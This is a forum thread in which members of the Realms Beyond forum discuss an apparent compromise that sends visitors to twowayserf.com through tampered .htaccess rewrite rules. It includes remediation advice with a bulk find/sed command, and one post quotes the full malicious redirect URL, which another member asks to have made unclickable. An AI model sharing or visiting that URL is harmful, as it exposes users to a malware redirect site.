September 19th, 2011, 15:15
(This post was last modified: September 20th, 2011, 05:11 by KingOfPain.)
Posts: 3,006
Threads: 264
Joined: Mar 2004
Nathan is on leave of absence. It was gracious of him to stop by and look, and provided me with some advice. I must say they look all geek to me, and looks like I need to dig deep. What I have to remove is hidden all over the VB scripts as you suspect. I'd also need to upgrade to the latest patch once it's done.
I am sorry to say it is going to take longer then it needed be because it looks over-my-head and I am having some eye issues that I can't spend extended amount of time reading text...
KoP
September 20th, 2011, 02:00
Posts: 1,922
Threads: 68
Joined: Mar 2004
Hi KoP,
it's okay if it takes some time, as long as it's done at all. Many webmasters simply don't care which plays right into the hands of the criminals, so thanks for doing this.
There are two kinds of fools. One says, "This is old, and therefore good." And one says, "This is new, and therefore better." - John Brunner, The Shockwave Rider
September 20th, 2011, 09:35
Posts: 6,690
Threads: 131
Joined: Mar 2004
Are there any offline backups of the code that you can restore from? I had the same thing happen to my site at http://www.dos486.com, something got access and injected malware links into all the HTML files. I recovered from that by re-uploading from my clean local copy.
October 19th, 2011, 02:10
Posts: 25
Threads: 0
Joined: Feb 2011
Sorry to necro a month old thread, but since the problem's still ongoing (well, insofar as the redirect's still happening, although admittedly "twowayserf.com" no longer exists, so it's more a problem of style than function now) I figured I'd chime in with my 2c.
These "twowayserf" tools seem to operate by taking advantage of bad filesystem permissions to upload busted .htaccess files which use mod_rewrite to 302 a user based on his referer (you knew this already I assume.) Based on some other poor bastard's report here it looks like it triggers on a bunch of search engine URLs in the Referer: field (99% of that guy's .htaccess is making sure that the user-agent in question is actually a browser, by the looks.)
In a nutshell, I'd suggest that the 10 second fix is to disable .htaccess globally for the RB vhost in your apache config. Having said that, VBulletin may well need .htaccess for legit functionality, so you could also try disabling mod_rewrite for RB, which would also do the trick.
If you have shell access to the machine RB's hosted on, you should be able to do something like "find . -name .htaccess -exec sed -ie 's/^Rewrite/#Rewrite/' {} \; " from RB's webroot, which will comment out any mod_rewrite invocations within htaccess files, while having no other side effects.
Of course, to prevent a recurrence of this issue you'll likely need to figure out how they suborned your .htaccess files in the first instance.
Again, apologies for the epic thread necromancy, but I figured my 2c may be useful to somebody. Feel free to ignore the noob/tell me to GTFO.
October 19th, 2011, 06:02
Posts: 3,390
Threads: 31
Joined: Dec 2009
fantasticsid Wrote:Sorry to necro a month old thread, but since the problem's still ongoing (well, insofar as the redirect's still happening, although admittedly "twowayserf.com" no longer exists, so it's more a problem of style than function now) I figured I'd chime in with my 2c.
These "twowayserf" tools seem to operate by taking advantage of bad filesystem permissions to upload busted .htaccess files which use mod_rewrite to 302 a user based on his referer (you knew this already I assume.) Based on some other poor bastard's report here it looks like it triggers on a bunch of search engine URLs in the Referer: field (99% of that guy's .htaccess is making sure that the user-agent in question is actually a browser, by the looks.)
In a nutshell, I'd suggest that the 10 second fix is to disable .htaccess globally for the RB vhost in your apache config. Having said that, VBulletin may well need .htaccess for legit functionality, so you could also try disabling mod_rewrite for RB, which would also do the trick.
If you have shell access to the machine RB's hosted on, you should be able to do something like "find . -name .htaccess -exec sed -ie 's/^Rewrite/#Rewrite/' {} \; " from RB's webroot, which will comment out any mod_rewrite invocations within htaccess files, while having no other side effects.
Of course, to prevent a recurrence of this issue you'll likely need to figure out how they suborned your .htaccess files in the first instance.
Again, apologies for the epic thread necromancy, but I figured my 2c may be useful to somebody. Feel free to ignore the noob/tell me to GTFO.
I have no idea what this means, but it sounds pretty clever, so I suggest we do whatever he says.
Posts: 10,034
Threads: 82
Joined: May 2012
just bumping because im pretty sure this is not fixed. ifim right it should probably be sticked to
Erebus in the Balance - a FFH Modmod based around balancing and polishing FFH for streamlined competitive play.
Posts: 599
Threads: 21
Joined: Jun 2005
Still getting this problem, searching from Yahoo fixes the search result problem.
On League of Legends I am "BertrandDeHorn"
September 3rd, 2012, 05:37
(This post was last modified: September 3rd, 2012, 09:42 by Jtm.)
Posts: 104
Threads: 0
Joined: Oct 2010
The problem is still present. Seemingly every hundredth or so click goes to following url:
url: twowayserf.com/cgi-bin/r.cgi?p=10003&i=db89d4dd&j=320&m=355730b2230e946f310ab6f79c1ea293&h=realmsbeyond.net&u=/forums/forumdisplay.php&q=f=56&t=20120903032943
I do not believe this is search engine issue. I believe the entry point to Realms Beyond forums is somehow infected. I'd suggest admins check serverside for infections and unknown routines. There are malicious programs that only redirect every tenth or even every thousandth entry. They hide by doing this redirection statistically so rarely that people think it is not worth mentioning and investigating.
September 3rd, 2012, 06:04
Posts: 1,922
Threads: 68
Joined: Mar 2004
Hi,
Jtm Wrote:The problem is still present. Seemingly every hundredth or so click goes to following url:
Could you (or a mod) please edit your post so that the URL is not clickable? Otherwise people might accidentally click on it and infect themselves.
Thanks!
-Kylearan
There are two kinds of fools. One says, "This is old, and therefore good." And one says, "This is new, and therefore better." - John Brunner, The Shockwave Rider
September 7th, 2012, 02:55
Posts: 6,893
Threads: 42
Joined: Oct 2009
I joined the long list of people accidentally being redirected to twowayserf from google link. My virus protection didn't block the site and virus scanning my computer doesn't seem to bring any hits. So does anybody really know what this site really tries to do and should I be worried?
|